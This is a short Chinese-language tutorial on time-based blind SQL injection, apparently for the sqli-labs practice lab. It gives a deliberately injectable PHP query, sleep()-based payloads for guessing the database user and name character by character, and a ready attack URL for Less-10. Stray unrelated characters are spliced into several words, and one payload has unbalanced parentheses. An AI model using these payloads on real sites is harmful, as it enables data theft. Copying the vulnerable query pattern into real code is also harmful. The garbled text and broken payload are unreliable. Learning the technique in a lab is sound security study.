時(shí)間盲注原理:
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row=mysql_fetch_array($result);
if($row)
{
echo "";
}
else
{
echo "";
}
- 代碼存在sql注入漏洞,然而頁(yè)面既不會(huì)回顯數(shù)據(jù)王带,也不會(huì)回顯錯(cuò)誤信息
- 語(yǔ)句執(zhí)行后也不提示真假,我們不能通過(guò)頁(yè)面的內(nèi)容來(lái)判斷
- 這里我們可以通過(guò)構(gòu)造語(yǔ)句,通過(guò)頁(yè)面響應(yīng)的時(shí)長(zhǎng)桑嘶,來(lái)判斷信息,這既是時(shí)間盲注
時(shí)間盲注方法:
構(gòu)造邏輯語(yǔ)句躬充,通過(guò)條件語(yǔ)句進(jìn)行判斷逃顶,為真就立即執(zhí)行讨便,否則延時(shí)執(zhí)行
核心語(yǔ)法:
if(left(user(),1)='a',0,sleep(3));
真實(shí)場(chǎng)景:
if(ascii(substr(database(),1,1)>115,0,sleep(5))%23
sqli-labs10:
http://127.0.0.1/Less-10/?id=1" and if(left(user(),1)='a',0,sleep(3))--+
